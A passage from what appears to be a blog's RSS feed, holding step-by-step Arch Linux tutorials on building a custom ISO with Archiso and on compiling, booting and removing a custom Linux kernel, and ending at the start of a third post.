Have you ever wanted to create your own custom Arch Linux ISO image, tailored to your specific needs and preferences? With Archiso, a powerful and highly customizable tool, you can do just that. Whether you&apos;re building a rescue system, a Linux installer, or a specialized distribution, Archiso provides the framework to create ISO images that perfectly suit your requirements.

### Install Archiso

To start using Archiso, you need to install the package first.

```shell
sudo pacman -S archiso
```

### Create Working Directory

You will need a working directory to store your customizations and configurations. Create a dedicated directory where you&apos;ll carry out the customization process:

```shell
mkdir archlive
```

### Copy Your Configuration Files

To create a custom Arch Linux ISO, you&apos;ll need to copy the configuration files from the `/usr/share/archiso/configs/releng/` directory to your working directory. These files serve as the foundation for your custom ISO and contain essential settings and configurations. This is why you need an existing Arch Linux system: it provides the configuration files to copy.

```shell
cp -r /usr/share/archiso/configs/releng/ archlive
```

### Building Arch Linux ISO

You can now start building your custom Arch Linux ISO by running the `mkarchiso` command. This command will generate the ISO image based on the configurations and settings you&apos;ve defined in the `releng` directory.

First, create an `output` directory for the final image and a `work` directory for temporary files. If you ever need to rebuild from scratch, simply delete the `work` directory and run the build again.

```shell
cd archlive
mkdir output work
```

And now you can start building the ISO by using the `mkarchiso` command.

```shell
sudo mkarchiso -v -w work -o output releng
```

### Monitor the Build Progress

During the ISO creation process, you&apos;ll see various messages indicating the progress of the build. These messages provide insights into the different stages being completed, such as package installation, file copying, and ISO generation.

The result will be like:

```shell
Written to medium : 408230 sectors at LBA 0
Writing to &apos;stdio:/home/username/your/path/here/archlive/output/archlinux-2023.08.27-x86_64.iso&apos; completed successfully.
[mkarchiso] INFO: Done!
798M  /home/username/your/path/here/archlive/output/archlinux-2023.08.27-x86_64.iso
```

### Testing Your Custom Arch Linux ISO

The next step is to test your creation to ensure that it functions as intended. This testing phase allows you to identify any issues or discrepancies that may arise when booting the ISO on various systems. To facilitate this testing, you&apos;ll need QEMU: install the `qemu-desktop` package, plus the `edk2-ovmf` package for UEFI support (firmware for virtual machines), by executing the following command:

```shell
sudo pacman -S qemu-desktop edk2-ovmf
```

You can then test your ISO in both BIOS and UEFI modes.

#### UEFI Mode Testing

To test your custom Arch Linux ISO in UEFI mode, use the following command:

```shell
run_archiso -u -i archlinux-2023.08.27-x86_64.iso
```

![UEFI Mode](./UEFI_test.png)

#### BIOS (Non-UEFI) Mode Testing

To test your custom Arch Linux ISO in BIOS mode, use the following command:

```shell
run_archiso -i archlinux-2023.08.27-x86_64.iso
```

![BIOS Mode](./BIOS_test.png)

### Customizing Your Arch Linux ISO Packages

One of the key benefits of creating a custom Arch Linux ISO is the ability to include specific packages that align with your needs and preferences. You can customize the list of packages included in your ISO by editing the `packages.x86_64` file located in the `releng` directory. This file contains a list of packages that will be installed on the ISO image.

```shell
nvim releng/packages.x86_64
```
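For example, appending package names (here `git` and `htop`, chosen arbitrarily) adds them to the ISO. The sketch below operates on a stand-in copy of the file so you can see the effect; in a real build you would edit `releng/packages.x86_64` directly:

```shell
# stand-in for releng/packages.x86_64 (example contents only)
mkdir -p /tmp/archlive-demo
printf '%s\n' base linux linux-firmware > /tmp/archlive-demo/packages.x86_64

# append extra packages, one per line, keeping the list sorted and unique
printf '%s\n' git htop >> /tmp/archlive-demo/packages.x86_64
sort -u -o /tmp/archlive-demo/packages.x86_64 /tmp/archlive-demo/packages.x86_64
cat /tmp/archlive-demo/packages.x86_64
```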

## Conclusion

In this guide, you&apos;ve learned how to build your own custom Arch Linux ISO using the powerful `mkarchiso` tool. By following the steps outlined in this tutorial, you&apos;ve gained the ability to create an ISO image that perfectly aligns with your needs and preferences. This process empowers you to customize the Arch Linux experience to a level that the official ISOs might not offer.

This also is a great way to start creating your very own Arch-based distribution, tailored to your specific requirements. Whether you&apos;re building a specialized system, a rescue disk, or a Linux installer, Archiso provides the flexibility and control you need to create a custom Arch Linux ISO that meets your unique needs.

## Resources

- [Archiso](https://wiki.archlinux.org/title/archiso)
- [Arch Linux: Create Your Own Installer](https://www.youtube.com/watch?v=-yPhW5o1hNM)
- [Build Your Own Distro With Archiso](https://www.youtube.com/watch?v=tSGGBbJBgvk)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Building your customized Linux Kernel</title><link>https://ummit.dev//posts/linux/kernel/build-your-custom-kernel/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/kernel/build-your-custom-kernel/</guid><description>Learn how to build your own custom Linux kernel from scratch on your Linux system (systemd-boot). Follow this step-by-step guide to gain insight into kernel customization and enhance your system&apos;s performance and features.</description><pubDate>Tue, 22 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Building a custom Linux kernel on Arch Linux might appear intimidating at first, but armed with the right knowledge, it becomes an empowering skill. This tutorial is designed to guide you through the process, simplifying each step with clear and straightforward commands.

Throughout this tutorial, we&apos;ll use Linux kernel version 6.4.12 as an example (current as of August 24, 2023). Keep in mind that you can adapt the steps for different kernel versions as needed.

Let&apos;s dive in and demystify the process of crafting your very own custom Linux kernel on Arch Linux.

## Step 1: Prepare Your System

Before delving into building the custom Linux kernel, it&apos;s essential to ensure your system is equipped with the necessary tools and packages. Follow these steps to prepare your system:

### Install Required Dependencies and Additional Packages

To ensure a smooth and successful kernel compilation process, it&apos;s essential to install both the required base development tools and additional packages that contribute to various aspects of building your custom Linux kernel on Arch Linux.

1. **Install Base Development Tools:**

Start by installing the `base-devel` meta package, which includes fundamental tools like `make` and `gcc`. Open a terminal and enter the following command:

```shell
sudo pacman -S base-devel
```

2. **Install Additional Packages:**

To further streamline the kernel compilation process and meet all prerequisites for building your custom Linux kernel, it&apos;s highly recommended to install the following additional packages:

```shell
sudo pacman -S xmlto kmod inetutils bc libelf git cpio perl tar xz
```

Each of these packages serves a specific purpose in the kernel build process:

- **xmlto**: Transforms XML documents into various formats such as HTML and PDF, used for kernel documentation generation.
- **kmod**: Provides utilities for managing kernel modules, including loading and unloading.
- **inetutils**: Offers common networking utilities like `ping` and `ifconfig`, helpful for kernel troubleshooting.
- **bc**: A command-line calculator with precision arithmetic, often used for calculations in kernel build scripts.
- **libelf**: A library for reading and writing ELF files, essential for working with executable and object files.
- **git**: Distributed version control system used for tracking kernel source code changes.
- **cpio**: Creates and extracts archive files, crucial for building `initramfs` images.
- **perl**: Programming language used in various scripting tasks, sometimes involved in the kernel build process.
- **tar**: Utility for creating and manipulating archive files, useful for packaging components of the kernel source code.
- **xz**: Compression utility for efficient file compression and decompression, vital for managing compressed files in the kernel build.

By installing both the base development tools and these additional packages, you ensure that your system is well-equipped to successfully compile, build, and customize your own Linux kernel on Arch Linux. This comprehensive approach minimizes potential issues during the kernel compilation process and helps you achieve your custom kernel with confidence.

## Step 2: Download the Kernel Source

Embark on your kernel customization journey by obtaining the kernel source code from the official source, kernel.org. The compressed tarball is sizeable, typically over 100 MB. Here are a few ways to download it:

### 1. Visit Kernel.org:

   The official source for Linux kernel releases is [kernel.org](https://kernel.org/). You can open the site in your web browser and download the source archive manually. The archive is large, so a stable internet connection is recommended.

   ![kernel.org](./Download Kernel source.png)

### 2. Download using `aria2c`:

   To expedite the process, especially considering the large file size, you can use the `aria2c` command-line tool. This command supports multiple connections for faster downloads:
   ```shell
   aria2c -x 16 &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.xz&quot;
   ```

### 3. Download using `wget`:

   If you prefer not to use a web browser, you can use the `wget` command-line tool to directly download the source code:
   ```shell
   wget &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.xz&quot;
   ```

Remember, whether you choose the efficient `aria2c`, the direct `wget`, or the manual browser download, obtaining the kernel source code from kernel.org is your initial step toward crafting your customized Linux kernel.
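
The commands above hard-code version 6.4.12. If you script your downloads, the URL can be derived from a version variable instead; here is a minimal sketch (the `KVER`, `MAJOR`, and `URL` variable names are illustrative, not official tooling):

```shell
# Build the kernel.org download URL for an arbitrary release.
KVER=6.4.12
MAJOR=${KVER%%.*}    # "6" -- everything before the first dot
URL="https://cdn.kernel.org/pub/linux/kernel/v${MAJOR}.x/linux-${KVER}.tar.xz"
echo "$URL"
```

You can then pass `$URL` to `aria2c` or `wget` exactly as shown above.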

## Step 3: Extract the Source Code

Decompress the downloaded archive using the `unxz` command. This turns `linux-6.4.12.tar.xz` into `linux-6.4.12.tar`; the tarball itself is unpacked in Step 5, after the optional signature check:
```shell
unxz -v linux-6.4.12.tar.xz
```

## Step 4: Verify the Signature (Optional)

To ensure the authenticity of the source code, follow these steps to verify its GPG signature:

### 1. Download the Signature File

   Begin by downloading the GPG signature file associated with the source code:
   ```shell
   aria2c -x 16 &quot;https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.4.12.tar.sign&quot;
   ```

### 2. Verify the Signature

   Next, use GPG to verify the signature of the downloaded source code:
   ```shell
   $ gpg --verify linux-6.4.12.tar.sign
   gpg: assuming signed data in &apos;linux-6.4.12.tar&apos;
   gpg: Signature made Wed 23 Aug 2023 11:33:44 PM HKT
   gpg:                using RSA key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: Can&apos;t check signature: No public key
   ```

### 3. Import the GPG Key

   The verification failed because the signing key is not yet in your local keyring. Import the key so GPG can check the signature (Greg Kroah-Hartman signs the stable releases):
   ```shell
   $ gpg --recv-key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: key 38DBBDC86092693E: 1 duplicate signature removed
   gpg: key 38DBBDC86092693E: public key &quot;Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;&quot; imported
   gpg: Total number processed: 1
   gpg:               imported: 1
   ```

### 4. Continue with Signature Confirmation

   Confirm the validity of the imported key against the signature once again:
   ```shell
   $ gpg --verify linux-6.4.12.tar.sign
   gpg: assuming signed data in &apos;linux-6.4.12.tar&apos;
   gpg: Signature made Wed 23 Aug 2023 11:33:44 PM HKT
   gpg:                using RSA key 647F28654894E3BD457199BE38DBBDC86092693E
   gpg: Good signature from &quot;Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;&quot; [unknown]
   gpg:                 aka &quot;Greg Kroah-Hartman &lt;gregkh@kernel.org&gt;&quot; [unknown]
   gpg:                 aka &quot;Greg Kroah-Hartman (Linux kernel stable release signing key) &lt;greg@kroah.com&gt;&quot; [unknown]
   gpg: WARNING: This key is not certified with a trusted signature!
   gpg:          There is no indication that the signature belongs to the owner.
   Primary key fingerprint: 647F 2865 4894 E3BD 4571  99BE 38DB BDC8 6092 693E
   ```
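
As a final sanity check, compare the primary key fingerprint in the output against the key ID you fetched: they are the same 40 hex digits, just grouped differently. A small sketch of that comparison:

```shell
# Strip the spaces from the printed fingerprint and compare it to the
# key ID used with --recv-key.
PRINTED="647F 2865 4894 E3BD 4571  99BE 38DB BDC8 6092 693E"
KEYID="647F28654894E3BD457199BE38DBBDC86092693E"
NORMALIZED=$(echo "$PRINTED" | tr -d ' ')
if [ "$NORMALIZED" = "$KEYID" ]; then
    echo "fingerprints match"
fi
```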

## Step 5: Extract the Source Code (Continued)

Continuing from where we left off, let&apos;s proceed with extracting the downloaded kernel source code using the following command:

```shell
tar xvf linux-6.4.12.tar
```

This unpacks the source tree into a `linux-6.4.12/` directory.

## Step 6: Navigate to the Kernel Source Directory

Navigate to the directory containing the kernel source code. You&apos;ll want to ensure that you have the necessary permissions to work with the source files without constantly relying on `sudo`. Here&apos;s how you can achieve that:

1. **Change Ownership of Kernel Source Directory:**

   To avoid using `sudo` for every operation, make sure the kernel source tree is owned by your user. If you downloaded and extracted it as a regular user, it already is; otherwise, change the ownership recursively (replace `$USER` with your actual username):

   ```shell
   sudo chown -R $USER:$USER linux-6.4.12
   ```

This ensures that you have the necessary access rights to work with the kernel source code and perform various operations without the constant need for superuser privileges.

## Step 7: Compile and Install Kernel

### 1. Navigate to the Kernel Source Directory:

   Move into the directory containing the kernel source code:
   ```shell
   cd linux-6.4.12
   ```

### 2. Configure Using Current Kernel Configuration

Configuring a kernel involves determining various settings and options that tailor the kernel to your system&apos;s hardware and requirements. The kernel configuration dictates which features, drivers, and functionalities will be included in the final compiled kernel. It&apos;s a crucial step in building a custom kernel that aligns with your specific needs.

In this context, the term &quot;configuration&quot; refers to a set of options stored in a file called `.config`. This file contains information about how the kernel should be built, what modules to include, which hardware support to enable, and more. The options can be adjusted through a configuration interface.

To streamline the process of configuring your custom kernel, you can use the configuration from your currently running kernel as a starting point. This ensures that your custom kernel maintains compatibility with your existing hardware and system setup.

The command to copy the configuration from your currently running kernel to the kernel source directory is:

```shell
cp /usr/src/linux/.config .
```

Here, `/usr/src/linux` is a symbolic link to the kernel source tree of your currently installed kernel. On Arch Linux this link exists only if a kernel source package provides it; if it is missing, you can usually extract the running kernel&apos;s embedded configuration instead with `zcat /proc/config.gz &gt; .config` (this requires `CONFIG_IKCONFIG_PROC`, which the stock Arch kernel enables). Either way, you end up with a `.config` file in your working directory to use as the basis for your custom configuration; running `make olddefconfig` afterwards fills in sensible defaults for any options that are new in your source tree. An excerpt of the file looks like this:

```shell
CONFIG_SCSI_MVSAS_TASKLET=y
CONFIG_SCSI_MVUMI=m
CONFIG_SCSI_ADVANSYS=m
CONFIG_SCSI_ARCMSR=m
CONFIG_SCSI_ESAS2R=m
CONFIG_MEGARAID_NEWGEN=y
CONFIG_MEGARAID_MM=m
CONFIG_MEGARAID_MAILBOX=m
CONFIG_MEGARAID_LEGACY=m
CONFIG_MEGARAID_SAS=m
CONFIG_SCSI_MPT3SAS=m
CONFIG_SCSI_MPT2SAS_MAX_SGE=128
CONFIG_SCSI_MPT3SAS_MAX_SGE=128
CONFIG_SCSI_MPT2SAS=m
CONFIG_SCSI_MPI3MR=m
CONFIG_SCSI_SMARTPQI=m
CONFIG_SCSI_HPTIOP=m
CONFIG_SCSI_BUSLOGIC=m
CONFIG_SCSI_FLASHPOINT=y
CONFIG_SCSI_MYRB=m
CONFIG_SCSI_MYRS=m
CONFIG_VMWARE_PVSCSI=m
CONFIG_XEN_SCSI_FRONTEND=m
CONFIG_HYPERV_STORAGE=m
CONFIG_LIBFC=m
CONFIG_LIBFCOE=m
CONFIG_FCOE=m
...
```

It&apos;s worth noting that the kernel configuration is a comprehensive topic on its own, with various options and settings that can significantly impact the behavior and performance of the kernel. Advanced users may explore tools like `make menuconfig`, `make xconfig`, or `make gconfig` to interactively configure the kernel&apos;s options. However, for the purpose of this guide, we&apos;ll focus on using the existing configuration to compile the custom kernel.
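
In excerpts like the one above, `=y` means a feature is compiled into the kernel image, `=m` means it is built as a loadable module, and a commented `is not set` line means it is disabled. A quick way to query a single option is to grep the file; the sketch below runs on a tiny sample fragment, but the same `grep` works on the real `.config`:

```shell
# Create a small sample fragment, then look up one option in it.
printf 'CONFIG_MEGARAID_NEWGEN=y\nCONFIG_MEGARAID_MM=m\n# CONFIG_SCSI_DEBUG is not set\n' | tee sample.config
grep '^CONFIG_MEGARAID_MM=' sample.config
```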

### 3. Compile the Kernel

Now that you&apos;ve configured your kernel, it&apos;s time to move on to the compilation phase. Compilation involves translating the human-readable source code into machine-executable instructions that your computer can understand and execute. This step transforms the kernel source code you&apos;ve customized into a functional kernel binary that your system can boot from.

To compile the kernel, you&apos;ll be using the `make` command, which automates the compilation process. Here&apos;s what the command does:

```shell
make ARCH=x86_64 -j $(nproc)
```

   ![compile the kernel](./Compile Kernel Modules.png)

- `make`: This command invokes the kernel build system and starts the compilation process.

- `ARCH=x86_64`: Specifies the target architecture for which you&apos;re compiling the kernel. In this case, it&apos;s the x86_64 architecture.

- `-j $(nproc)`: The `-j` flag tells the compiler to utilize multiple processor cores for parallel compilation, which significantly speeds up the process. `$(nproc)` dynamically determines the number of available processor cores and uses them for compilation.

During compilation, the kernel source code is transformed into multiple object files and then linked together to create the final kernel binary. The `-j` flag ensures that multiple compilation tasks are performed simultaneously, maximizing the efficiency of your system&apos;s processing power.

Compilation might take a long time, depending on your hardware and the complexity of your kernel configuration.
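
If you want to keep the machine usable while it builds, you can reserve a core instead of using every CPU. A small illustrative calculation (the `JOBS` variable is not part of the kernel build system):

```shell
# Use one job fewer than the CPU count, but never fewer than one.
TOTAL=$(nproc)
if [ "$TOTAL" -gt 1 ]; then
    JOBS=$((TOTAL - 1))
else
    JOBS=1
fi
echo "would run: make ARCH=x86_64 -j $JOBS"
```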

### 4. Install Kernel Modules

Once your custom kernel is compiled, it&apos;s crucial to install the associated kernel modules to ensure your system&apos;s optimal functionality. Kernel modules are essential pieces of software that enable your operating system&apos;s kernel to interact with various hardware components, file systems, and system functionalities. Installing these modules correctly is key to a smooth and well-functioning system.

The following command will install the kernel modules for your custom-built kernel:

```shell
sudo make ARCH=x86_64 modules_install
```

   ![install the kernel](./Install Kernel Modules.png)

#### What does this command do?

It performs the following tasks:

1. **Installation**: It takes the kernel modules that were already built during the kernel compilation step and installs them onto your system.

2. **Destination Directory**: The modules are installed into the `/lib/modules` directory on your system. This directory is structured to accommodate various kernel versions and their associated modules.

3. **Kernel Version Subdirectory**: Inside `/lib/modules`, a subdirectory is created with the version number of your custom kernel. This ensures that modules for different kernel versions can coexist without conflicts.

4. **Module Files**: Within the version-specific subdirectory, the individual kernel module files are placed. These files contain the code needed to support various hardware and software functionalities.

By installing the kernel modules to the appropriate location, you ensure that your custom kernel can effectively manage your hardware devices, file systems, and other crucial system components. This step is essential for the overall stability and performance of your custom-built Linux kernel.

## Step 8: Copy Your Own Kernel to /boot/

After successfully compiling your custom Linux kernel, it&apos;s essential to make it accessible by copying the necessary files to the `/boot` directory. This ensures that your system recognizes and can boot from the new kernel.

Use the following command to copy the compiled kernel image (`bzImage`) to the `/boot` directory. The destination file name matters: the mkinitcpio preset and the boot entry in the next steps refer to `/boot/vmlinuz-linux-custom`, so use that name here.

- The `-v` flag is used to display detailed progress while copying.

```shell
sudo cp -v arch/x86_64/boot/bzImage /boot/vmlinuz-linux-custom
```

## Step 9: Create and Configure Kernel Initramfs

The **initramfs** (initial RAM file system) is a temporary file system that&apos;s loaded into memory during the boot process before the root file system is available. It contains essential drivers, binaries, and scripts required for the system to identify and access the root file system. Customizing and generating your own initramfs can be crucial, especially if you&apos;re making changes to your kernel.

### 1. Duplicate and Modify the Preset File

To start customizing your initramfs, begin by duplicating the existing `linux.preset` file for your custom kernel. This file is used by `mkinitcpio` to generate the initramfs. Run the following command to make a copy:

```shell
sudo cp /etc/mkinitcpio.d/linux.preset /etc/mkinitcpio.d/linux-custom.preset
```

### 2. Open the Newly Created `linux-custom.preset`

Open the newly created `linux-custom.preset` file using a text editor of your choice. Within this file, you&apos;ll need to make specific modifications to adapt it for your custom kernel. Locate the relevant lines and adjust them as follows:

```shell
...
ALL_kver=&quot;/boot/vmlinuz-linux-custom&quot;
...
default_image=&quot;/boot/initramfs-linux-custom.img&quot;
...
fallback_image=&quot;/boot/initramfs-linux-custom-fallback.img&quot;
```

For clarity, here&apos;s how the modified section might appear:

```shell
# mkinitcpio preset file for the &apos;linux-custom&apos; package

#ALL_config=&quot;/etc/mkinitcpio.conf&quot;
ALL_kver=&quot;/boot/vmlinuz-linux-custom&quot;
ALL_microcode=(/boot/*-ucode.img)

PRESETS=(&apos;default&apos; &apos;fallback&apos;)

#default_config=&quot;/etc/mkinitcpio.conf&quot;
default_image=&quot;/boot/initramfs-linux-custom.img&quot;
#default_uki=&quot;/efi/EFI/Linux/arch-linux.efi&quot;
#default_options=&quot;--splash /usr/share/systemd/bootctl/splash-arch.bmp&quot;

#fallback_config=&quot;/etc/mkinitcpio.conf&quot;
fallback_image=&quot;/boot/initramfs-linux-custom-fallback.img&quot;
#fallback_uki=&quot;/efi/EFI/Linux/arch-linux-fallback.efi&quot;
fallback_options=&quot;-S autodetect&quot;
```

Adjust these values according to your kernel version and naming conventions.
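
If you prefer not to hand-edit the preset, the same three changes can be made with `sed`. The sketch below operates on a sample fragment of the file; on a real system you would point the same `sed` command (with `sudo`) at `/etc/mkinitcpio.d/linux-custom.preset`:

```shell
# Start from a stock-style fragment, then rewrite the three image paths.
printf 'ALL_kver="/boot/vmlinuz-linux"\ndefault_image="/boot/initramfs-linux.img"\nfallback_image="/boot/initramfs-linux-fallback.img"\n' | tee linux-custom.preset
sed -i -e 's|vmlinuz-linux|vmlinuz-linux-custom|' \
       -e 's|initramfs-linux\.img|initramfs-linux-custom.img|' \
       -e 's|initramfs-linux-fallback\.img|initramfs-linux-custom-fallback.img|' \
       linux-custom.preset
cat linux-custom.preset
```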

### 3. Generate the Custom Initramfs

Finally, generate the custom initramfs using the modified preset file:

```shell
sudo mkinitcpio -p linux-custom
```

This command will build the initramfs based on your custom configuration.

By creating and configuring your own initramfs, you ensure that essential components required for the boot process are tailored to your custom kernel. This step further enhances the compatibility and stability of your customized Linux kernel configuration.

## Step 10: Create a Boot Loader Configuration

You&apos;ve done the hard work, and now it&apos;s time to ensure your custom kernel is properly loaded during boot. This involves creating a boot loader configuration file. If you&apos;re using systemd-boot, follow these steps:

### 1. Edit Boot Loader Configuration
   Use your favorite text editor to create or modify your boot loader&apos;s configuration file. In the case of systemd-boot, the configuration file is typically located at `/boot/loader/entries/arch-custom.conf`:
   ```shell
   sudo nano /boot/loader/entries/arch-custom.conf
   ```

### 2. Add Configuration
   Insert the following lines into the configuration file to define your custom kernel (replace `/dev/sda2` with your actual root partition):
   ```shell
   title Arch Linux Custom
   linux /vmlinuz-linux-custom
   initrd /initramfs-linux-custom.img

   options root=/dev/sda2 quiet ro
   ```

### 3. Save and Exit
   Save the file and exit the text editor.
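
The whole entry can also be generated in one step. The sketch below writes to a local file with a placeholder UUID; on a real system, substitute the output of `findmnt -no UUID /` for `ROOT_UUID` and write the result to `/boot/loader/entries/arch-custom.conf` with `sudo`. Identifying the root file system by UUID is an alternative to the `/dev/sda2` form used above and survives device renaming.

```shell
# Generate the boot entry; ROOT_UUID is a placeholder to be replaced.
ROOT_UUID="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
printf 'title Arch Linux Custom\nlinux /vmlinuz-linux-custom\ninitrd /initramfs-linux-custom.img\noptions root=UUID=%s quiet ro\n' "$ROOT_UUID" | tee arch-custom.conf
```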

### 4. Update Boot Loader

With systemd-boot, this usually takes care of itself: the boot menu is rebuilt from the entry files in `/boot/loader/entries/` on every boot, so after creating `arch-custom.conf` the new entry appears automatically the next time the machine starts.

To confirm the entry is recognized without rebooting, you can list the entries systemd-boot sees:

1. Open a terminal and enter the following command:
   ```shell
   sudo bootctl list
   ```

Note that `sudo bootctl update` does something different: it updates the systemd-boot binary itself in the EFI system partition; it does not manage menu entries.

## Final Step: Reboot and Verify Your Custom Kernel

Congratulations! You&apos;ve successfully compiled and installed your own custom Linux kernel. The process might have taken some time and effort, but now you have a tailored kernel that fits your system&apos;s requirements. Let&apos;s take the final steps to reboot your computer and ensure that your new custom kernel is up and running.

### 1. Reboot Your System

To apply the changes and boot into your new custom kernel, issue the following command:

```shell
sudo reboot
```

Executing this command will initiate a system reboot, allowing you to select your custom kernel from the bootloader menu.

### 2. Verify the New Kernel

Once your system has rebooted and you&apos;ve selected your custom kernel from the bootloader, it&apos;s time to verify that everything is in order. Open a terminal and enter the following command to check the version of your newly installed custom kernel:

```shell
uname -mrs
```

#### Expected Output

You should see output similar to the following, indicating your new Linux kernel version:

```shell
Linux 6.4.12 x86_64
```

This confirms that your custom kernel is now successfully running on your Arch Linux system.
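
If you ever want to check this from a script, compare the running release string against the version you built (6.4.12 in this guide):

```shell
# Report whether the expected custom kernel release is running.
RUNNING=$(uname -r)
echo "running kernel: $RUNNING"
case "$RUNNING" in
    6.4.12*) echo "custom kernel is active" ;;
    *)       echo "a different kernel is running" ;;
esac
```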

## Deleting a Custom Kernel (If Needed)

While customizing your Linux system can be exciting, there may come a time when you need to clean up and remove certain components, such as a custom kernel. Whether you&apos;re making space or simplifying your setup, deleting a custom kernel involves a few straightforward steps.

### Why Remove a Custom Kernel?

Custom kernels can be beneficial for fine-tuning your system&apos;s performance, enabling specific features, or testing new functionalities. However, as your system evolves, you might find that you no longer need a particular custom kernel or want to revert to the default kernel provided by your Linux distribution. Removing a custom kernel can help streamline your system and free up disk space.

### Step 1: Identify the Custom Kernel

Before you proceed with deletion, identify the custom kernel you wish to remove. You&apos;ll need to know its version number and any associated files.

```shell
ls -la /boot
```

### Step 2: Boot into a Different Kernel

To safely delete a custom kernel, it&apos;s advisable to boot into a different kernel version. This ensures that the kernel you&apos;re attempting to delete is not currently in use, reducing the risk of destabilizing your system.
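
### Step 3: Remove the Kernel Image and Initramfs

Before touching the configuration files, delete the kernel image and initramfs files you copied into `/boot` earlier. With the file names used in this guide, the real commands are `sudo rm -v /boot/vmlinuz-linux-custom /boot/initramfs-linux-custom.img /boot/initramfs-linux-custom-fallback.img`. The sketch below rehearses the same removal in a scratch directory, so you can see exactly which files go before running it against `/boot`:

```shell
# Rehearsal in a scratch directory; on the real system the files live
# in /boot and removing them requires sudo.
BOOT=./demo-boot
mkdir -p "$BOOT"
touch "$BOOT/vmlinuz-linux-custom" \
      "$BOOT/initramfs-linux-custom.img" \
      "$BOOT/initramfs-linux-custom-fallback.img"
rm -v "$BOOT/vmlinuz-linux-custom" "$BOOT"/initramfs-linux-custom*.img
ls -A "$BOOT"
```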

### Step 4: Remove Configuration Files

In addition to cleaning up the kernel-related files, it&apos;s important to remove the associated configuration files that were created during the installation of the custom kernel. This step ensures that your system no longer references the custom kernel. Here&apos;s what you need to do:

1. **Remove the Preset File:**

   Locate and remove the preset file associated with the custom kernel. This file is used by the `mkinitcpio` tool to generate the initial RAM disk image. Open a terminal and enter the following command:

   ```shell
   sudo rm -v /etc/mkinitcpio.d/linux-custom.preset
   ```

   This removes the configuration file used for creating the initramfs image for the custom kernel.

2. **Remove the Boot Loader Entry:**

   If you added a custom boot loader entry for the custom kernel, you should remove it to prevent any reference to the kernel during the boot process. The file name below matches the entry created earlier in this guide:

   ```shell
   sudo rm -v /boot/loader/entries/arch-custom.conf
   ```

   This ensures that your boot loader menu no longer lists the custom kernel as an option.

By removing these configuration files, you&apos;re ensuring that your system no longer retains any traces of the custom kernel. This step completes the process of removing the custom kernel from your system, freeing up resources and streamlining your setup.

### Step 5: Remove Kernel Modules

After deleting the kernel-related files, remove the associated kernel modules. Kernel modules are essential components that extend the functionality of the Linux kernel, and removing the ones associated with the custom kernel ensures that no remnants are left behind. On Arch Linux, `/lib` is a symbolic link to `/usr/lib`, so `/lib/modules` and `/usr/lib/modules` are the same directory and one removal is enough; checking both paths is only needed on systems without a merged `/usr`. Here&apos;s how to do it:

1. **Remove Modules in `/lib/modules`:**

   - Open a terminal and navigate to the `/lib/modules` directory:

     ```shell
     cd /lib/modules
     ```

   - List the directories in this location to find the directory associated with the custom kernel version:

     ```shell
     ls
     ```

   - Remove the directory for the custom kernel version (the directory name is the kernel release string):

     ```shell
     sudo rm -rfv 6.4.12
     ```

2. **Remove Modules in `/usr/lib/modules`:**

   - Similarly, navigate to the `/usr/lib/modules` directory:

     ```shell
     cd /usr/lib/modules
     ```

   - List the directories to find the one corresponding to the custom kernel version:

     ```shell
     ls
     ```

   - Likewise, delete the directory for the custom kernel version:

     ```shell
     sudo rm -rfv 6.4.12
     ```

By removing kernel modules from both `/lib/modules` and `/usr/lib/modules`, you&apos;re ensuring a clean removal of the custom kernel from your system. This step completes the process, freeing up resources and streamlining your setup.

**Understanding `/lib/modules` and `/usr/lib/modules`:**

On Arch Linux and other merged-`/usr` distributions, `/lib` is simply a symbolic link to `/usr/lib`, so these two paths name the same directory: deleting the module directory through either path removes it from both. On older or non-merged systems they can be distinct locations, which is why it&apos;s good practice to check both and make sure no remnants of the custom kernel remain on your system.

### Step 6: Update the Bootloader (Optional)

With systemd-boot, the menu is rebuilt from the entry files in `/boot/loader/entries/` at each boot, so deleting the custom entry file already removes it from the menu; no explicit update command is required. For extra assurance, you can verify without rebooting:

1. **List Boot Entries:**

   Open a terminal and check which entries the boot loader currently recognizes:

   ```shell
   sudo bootctl list
   ```

(`sudo bootctl update` refreshes the systemd-boot binary in the EFI system partition; it does not manage menu entries.)

By performing this optional check, you&apos;re making sure that your boot menu accurately reflects the removal of the custom kernel. This helps maintain the overall integrity of your system&apos;s boot process.

## Conclusion

Congratulations! You&apos;ve successfully navigated the process of building a custom Linux kernel on your Arch Linux system. From acquiring the source code to configuring, compiling, and integrating the kernel into your boot loader, you&apos;ve gained an in-depth understanding of the kernel&apos;s inner workings. This knowledge not only empowers you to fine-tune your system&apos;s performance and features but also deepens your grasp of the foundational components of your operating system.

Having crafted your own Linux kernel, you now possess the ability to tailor your system&apos;s behavior according to your preferences and requirements. The advantages of a customized kernel configuration are at your fingertips, enabling you to harness the full potential of your hardware.

When it comes to removing a custom kernel from your Linux system, a cautious approach is key to maintaining system stability. By meticulously identifying the kernel, booting into an alternate version, and systematically removing associated files, you can safely eliminate a custom kernel. This method ensures that your system retains its functionality and efficiency, reflecting your current needs and choices.

## References

- [How to compile and install Linux Kernel 5.16.9 from source code](https://www.cyberciti.biz/tips/compiling-linux-kernel-26.html)
- [How to build and install your own Linux kernel](https://wiki.linuxquestions.org/wiki/How_to_build_and_install_your_own_Linux_kernel)
- [Kernel/Traditional compilation](https://wiki.archlinux.org/title/Kernel/Traditional_compilation)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Using Different Linux Kernel Versions with systemd-boot and Bootctl</title><link>https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-config-new-options/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-config-new-options/</guid><description>Exploring the process of seamlessly switching between Linux kernel versions using systemd-boot and Bootctl for enhanced system performance and flexibility.</description><pubDate>Tue, 22 Aug 2023 00:00:00 GMT</pubDate><content:encoded>### **Introduction**

